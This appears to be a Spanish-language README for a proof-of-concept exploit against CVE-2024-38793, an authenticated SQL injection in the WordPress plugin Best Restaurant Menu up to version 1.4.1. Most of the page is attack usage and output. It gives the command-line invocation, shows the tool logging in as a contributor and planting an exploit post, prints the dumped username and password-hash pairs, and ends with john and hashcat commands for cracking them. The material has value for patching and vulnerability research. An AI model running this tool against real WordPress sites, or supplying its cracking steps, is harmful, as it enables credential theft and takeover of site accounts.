
Código de prueba de concepto para la explotación de CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Inyección SQL autenticada (Colaborador+))
Código de Prueba de Concepto para la explotación de CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Inyección SQL autenticada (Colaborador+)).
Este es un exploit de prueba de concepto para la vulnerabilidad CVE-2024-38793, una vulnerabilidad de inyección SQL en versiones del plugin de WordPress Best Restaurant Menu, también conocido como Great Restaurant Menu WP anteriores a la 1.4.2.
La vulnerabilidad se produce por la falta de sanitización de entrada en el argumento groups al usar el shortcode brm_restaurant_menu.
Nota: Esto requiere las credenciales de un usuario con al menos privilegios de nivel Colaborador.
El código intentará obtener los nombres de usuario y los hashes de contraseñas de la tabla de usuarios de WordPress.
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
Requires Contributor+ Privileges on a WordPress instance with the plugin installed
Credit: @ret2desync
Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
Example usage:
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
Requires Contributor+ Privileges on a WordPress instance with the plugin installed
Credit: @ret2desync
Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
Example usage:
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[*** Credentials ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with:
john <hashes_file> --wordlist=<wordlist>
hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully